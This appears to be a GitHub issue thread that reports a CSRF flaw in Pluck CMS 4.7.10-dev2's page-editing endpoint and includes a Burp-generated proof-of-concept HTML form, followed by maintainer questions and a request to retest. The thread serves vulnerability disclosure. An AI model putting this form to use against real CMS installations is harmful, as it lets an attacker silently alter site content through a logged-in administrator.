pluck-cms / pluck

Central repo for pluck cms

Home Page:http://www.pluck-cms.org

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

An issue was discovered in Pluck 4.7.10-dev2. There is a CSRF vulnerability that can editpage via a /admin.php?action=editpage

F1sh1001 opened this issue · comments

CSRF POC:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/pluck/admin.php?action=editpage&page=111" method="POST">
      <input type="hidden" name="title" value="evil" />
      <input type="hidden" name="seo&#95;name" value="111" />
      <input type="hidden" name="content" value="evil" />
      <input type="hidden" name="description" value="" />
      <input type="hidden" name="keywords" value="" />
      <input type="hidden" name="hidden" value="no" />
      <input type="hidden" name="sub&#95;page" value="" />
      <input type="hidden" name="theme" value="oldstyle" />
      <input type="hidden" name="save" value="Save" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

图片

Where did you insert the script?? it is a javascript so it only resides in the client.
The /h1 wil not appear in the file on disk..

Please explain more.

After the adminisstrator open the csrf exp page,then a new page called evil will be added to your website.
图片

Could you please test the latest dev release 4.7.10-dev4?
https://github.com/pluck-cms/pluck/releases/tag/4.7.10-dev4

Have you retested with the latest dev version?